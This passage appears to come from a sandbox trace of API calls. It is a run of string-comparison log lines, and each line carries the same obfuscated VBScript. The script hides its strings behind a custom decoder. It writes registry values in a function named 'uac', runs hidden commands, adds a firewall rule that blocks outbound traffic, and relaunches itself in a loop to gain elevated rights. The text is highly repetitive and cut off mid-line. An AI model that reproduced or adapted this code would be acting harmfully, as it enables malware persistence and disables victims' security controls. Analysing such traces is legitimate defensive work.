bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0223.029] wcsncmp (_String1="\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0223.029] wcsncmp (_String1="newRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0223.030] wcsncmp (_String1="ewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.030] wcsncmp (_String1="wRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0223.030] wcsncmp (_String1="Rule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, 